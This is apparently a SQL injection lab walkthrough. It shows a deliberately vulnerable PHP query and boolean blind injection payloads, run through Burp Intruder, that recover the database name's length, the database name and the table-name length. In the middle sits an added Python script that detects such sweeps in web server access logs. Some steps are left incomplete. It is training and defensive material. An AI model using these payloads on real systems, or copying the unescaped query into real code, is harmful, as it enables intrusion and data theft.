View the source code:
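if(isset($_GET['id']))
{
    $id = $_GET['id'];  // deliberately vulnerable: used unescaped below
    $sql = "SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
    $result = mysqli_query($con, $sql);  // $con: existing mysqli connection
    $row = $result ? mysqli_fetch_array($result) : null;
    if($row)
    { echo 'You are in.... Use outfile......'; }
    else
    { echo 'You have an error in your SQL syntax';
      //print_r(mysqli_error($con));
    }
}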
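Input is taken via GET and the injection format is ?id=*')) * --+. When the condition is true the page shows You are in.... Use outfile......, and when it is false the page shows You have an error in your SQL syntax
Length of the current database name:
Open Burp and capture the request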
Action
Send to Intruder
Positions
?id=1')) and (select length(database()))='§0§' --+
Payload
Payload Options [Simple list]
Add from list
0-9
Options
Start attack
The Length column
So the length of the current database name is 8
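The sweep above leaves a recognizable trace in the web server's access log: one client sends the same probe many times with only the guessed value changing, and the response size splits into two values. The following is an added detection example, not part of the original page; it generalizes from the length probe to any swept boolean probe. The combined-log format, the /app/ path, the client addresses and the response sizes are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} (\d+)')
# Quote/paren break-out followed by a boolean operator and a SQL probe keyword.
PROBE_RE = re.compile(r"['\")]\s*(?:and|or)\b.*\b(?:select|length|substr|ascii|information_schema)\b")

def find_sweeps(lines, min_variants=5):
    """Return {(client, path, param, template): (variant_count, sorted response sizes)}."""
    groups = defaultdict(lambda: (set(), set()))
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, size = m.groups()
        url = urlsplit(target)
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            low = value.lower()
            if not PROBE_RE.search(low):
                continue
            # Collapse digits so requests differing only in the swept value share a template.
            template = re.sub(r"\d+", "N", low).strip()
            variants, sizes = groups[(client, url.path, name, template)]
            variants.add(value)
            sizes.add(int(size))
    return {k: (len(v), sorted(s)) for k, (v, s) in groups.items() if len(v) >= min_variants}

def sample_log():
    """Constructed log lines: one normal request plus a 0-9 sweep of the page's length probe."""
    lines = ['198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /app/?id=1 HTTP/1.1" 200 706']
    for n in range(10):
        size = 706 if n == 8 else 711  # constructed sizes: only the true guess differs
        q = f"id=1%27))%20and%20(select%20length(database()))=%27{n}%27%20--+"
        lines.append(f'203.0.113.9 - - [01/Jan/2024:10:01:{n:02d} +0000] '
                     f'"GET /app/?{q} HTTP/1.1" 200 {size}')
    return lines

if __name__ == "__main__":
    for key, (count, sizes) in find_sweeps(sample_log()).items():
        print(key, count, sizes)
```

Exactly two distinct response sizes within one flagged group indicates that the true/false messages in the source are acting as an oracle for the client.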
Name of the current database:
Open Burp and capture the request
Action
Send to Intruder
Positions
In summary, the name of the current database is security
Total length of all table names in the security database:
?id=1')) and (select length(group_concat(table_name))>1 from information_schema.tables where table_schema='security') --+
So the total length of all table names in the security database is